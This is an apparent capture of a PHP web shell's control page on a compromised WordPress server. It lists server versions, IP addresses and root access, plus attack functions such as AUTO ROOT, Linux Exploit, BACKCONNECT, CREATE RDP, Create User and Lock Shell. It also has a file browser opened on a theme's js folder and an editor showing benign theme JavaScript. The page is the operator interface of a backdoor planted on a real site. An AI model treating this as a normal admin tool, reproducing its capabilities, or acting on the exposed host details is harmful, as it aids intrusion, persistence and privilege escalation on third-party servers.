Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
insepet /
wp-content /
themes /
micron /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
admin-scripts.js
7.23
KB
-rw-r--r--
controller.js
23.97
KB
-rw-r--r--
fromTo.js
914
B
-rw-r--r--
imagesloaded.pkgd.min.js
6.42
KB
-rw-r--r--
jquery.animate-colors-min.js
2.69
KB
-rw-r--r--
jquery.colorbox-min.js
10.64
KB
-rw-r--r--
jquery.contentcarousel.js
5.38
KB
-rw-r--r--
jquery.easing.min.js
5.42
KB
-rw-r--r--
jquery.easy-pie-chart.js
6.44
KB
-rw-r--r--
jquery.flexslider-min.js
20.92
KB
-rw-r--r--
jquery.inview.min.js
1.23
KB
-rw-r--r--
jquery.mobile-events.min.js
13.29
KB
-rw-r--r--
jquery.mousewheel.js
7.18
KB
-rw-r--r--
jquery.ninzio-slider-preview.j...
2.55
KB
-rw-r--r--
jquery.ninzio-slider.js
9.37
KB
-rw-r--r--
jquery.simplr.smoothscroll.js
1.26
KB
-rw-r--r--
jquery.singlePageNav.min.js
2.49
KB
-rw-r--r--
jquery.ui.totop.min.js
1.3
KB
-rw-r--r--
masonry.pkgd.min.js
24.1
KB
-rw-r--r--
media-modal.js
1.78
KB
-rw-r--r--
modernizer.js
14.27
KB
-rw-r--r--
multi-post-thumbnails-admin.js
1.89
KB
-rw-r--r--
retina-1.1.0.min.js
2.92
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-scripts.js
( function($) { var custom_uploader; var upload = $('.ninzio-button-upload'); var path = $('.ninzio-upload-path'); var preview = $('.ninzio-preview-upload'); var remove = $('.ninzio-button-remove'); upload.click(function(e) { e.preventDefault(); if (custom_uploader) { custom_uploader.open(); return; } custom_uploader = wp.media.frames.file_frame = wp.media({ title: 'Upload background image', button: { text: 'Upload background image' }, multiple: false }); custom_uploader.on('select', function() { attachment = custom_uploader.state().get('selection').first().toJSON(); path.val(attachment.url); preview.attr('src',attachment.url); }); custom_uploader.open(); }); remove.click(function(e){ e.preventDefault(); path.val(""); preview.attr('src',""); }); })(jQuery); (function($){ // Accordion var accordionTitle = $('.ninzio-accordion-container > .ninzio-accordion-title'); accordionTitle.on('click', function(){ var $this = $(this), index = $('.ninzio-ui').index(this), layerIndex = $('.ninzio-hidden').eq(index); if(!$this.hasClass('active')){ $this.addClass('active'); $this.next('.ninzio-accordion-content').slideUp(0, function(){ if($this.hasClass('ninzio-ui')){ layerIndex.val('active'); } }); } else if ($this.hasClass('active')){ $this.removeClass('active'); $this.next('.ninzio-accordion-content').slideDown(0, function(){ if($this.hasClass('ninzio-ui')){ layerIndex.val(''); } }); } }); })(jQuery); (function($){ $('.ninzio-color-picker').wpColorPicker(); $('.delay, .duration').spinner({ min:0, step: 50 }); $('.opacity').spinner({ step: 0.1, min:0, max:1 }); $('.zindex').spinner({ min:1, max:98 }); })(jQuery); ( function($) { $('.ninzio-slider-excrepts') .sortable({ axis: 'y', placeholder: 'ui-state-highlight', forcePlaceholderSize: true, update: function(event, ui) { var theOrder = $(this).sortable('toArray'); var data = { action: 'ninzio_update_post_order', postType: $(this).attr('data-post-type'), order: theOrder }; $.ajax({ type: "POST", url: ajaxurl, data: data, success: function(){ $(".ninzio-success").show(); }, error: function(){ $(".ninzio-error").show(); } }) } }) .disableSelection(); })(jQuery); ( function($) { var ninzioPostFormatOptions = $('#ninzio-post-format-options'); var postFormatInput = $("#post-formats-select input.post-format"); var featuredImages = $('#postimagediv, #post-feature-image-2, #post-feature-image-3, #post-feature-image-4, #post-feature-image-5'); var defaultFeaturedImage = $('#postimagediv'); var postFeatureMedia = ninzioPostFormatOptions.find('#ninzio-post-featured-media'); function switchPostFormatOptions(target){ if (target.val() == 'chat' || target.val() == 'aside') { ninzioPostFormatOptions.find('.ninzio-post-option').hide(); ninzioPostFormatOptions.hide(); featuredImages.hide(); } else { ninzioPostFormatOptions.show(); var ninzioPostOption = ninzioPostFormatOptions.find('#ninzio-'+target.attr("id")).show(); if(target.val() == '0' || target.val() == 'audio' || target.val() == 'video' || target.val() == 'gallery'){ postFeatureMedia.show(); } else { postFeatureMedia.hide(); } if(target.val() == '0' || target.val() == 'audio'){ defaultFeaturedImage.show(); } else if(target.val() == 'gallery'){ featuredImages.show(); } else { featuredImages.hide(); } ninzioPostFormatOptions.find('.ninzio-post-option').not(ninzioPostOption).hide(); } } postFormatInput.each(function(){ var $this = $(this); $this.on('click', function(){ switchPostFormatOptions($this); }); if($this.is(":checked")){ switchPostFormatOptions($this); } }); })(jQuery); ( function($) { var ninzioPortfolioFormatOptions = $('#ninzio-portfolio-media-options'); var portfolioMediaInput = $(".select-featured-media-type input.portfolio-featured-media-option"); var featuredImages = $('#portfolio-feature-image-2, #portfolio-feature-image-3, #portfolio-feature-image-4, #portfolio-feature-image-5'); var defaultFeaturedImage = $('#postimagediv'); var portfolioFeatureMedia = ninzioPortfolioFormatOptions.find('#ninzio-portfolio-featured-media'); function switchPOortfolioMediaOptions(target){ var ninzioPortfolioOption = ninzioPortfolioFormatOptions.find('#ninzio-'+target.attr("id")).show(); if(target.val() == 'image' || target.val() == 'video' || target.val() == 'audio' ){ defaultFeaturedImage.show(); featuredImages.hide(); } else if(target.val() == 'gallery'){ defaultFeaturedImage.show(); featuredImages.show(); } ninzioPortfolioFormatOptions.find('.ninzio-portfolio-option').not(ninzioPortfolioOption).hide(); } portfolioMediaInput.each(function(){ var $this = $(this); $this.on('click', function(){ switchPOortfolioMediaOptions($this); }); if($this.is(":checked")){ switchPOortfolioMediaOptions($this); } }); })(jQuery); ( function($) { var pageTemplate = $('#pageparentdiv #page_template'); var pageOptions = $('#ninzio-page-options'); pageTemplate.on("change", function(){ if ($(this).val() == "page-blank.php") { pageOptions.find('.dynamic').hide(); pageOptions.find('.sitemap-off').show(); } else if($(this).val() == "page-sitemap.php"){ pageOptions.find('.sitemap-off').hide(); pageOptions.find('.dynamic').show(); } else { pageOptions.find('.dynamic').show(); pageOptions.find('.sitemap-off').show(); } }); if (pageTemplate.find('option:selected').val() == "page-blank.php") { pageOptions.find('.dynamic').hide(); pageOptions.find('.sitemap-off').show(); } else if(pageTemplate.find('option:selected').val() == "page-sitemap.php"){ pageOptions.find('.sitemap-off').hide(); pageOptions.find('.dynamic').show(); } else { pageOptions.find('.dynamic').show(); pageOptions.find('.sitemap-off').show(); } })(jQuery);
Close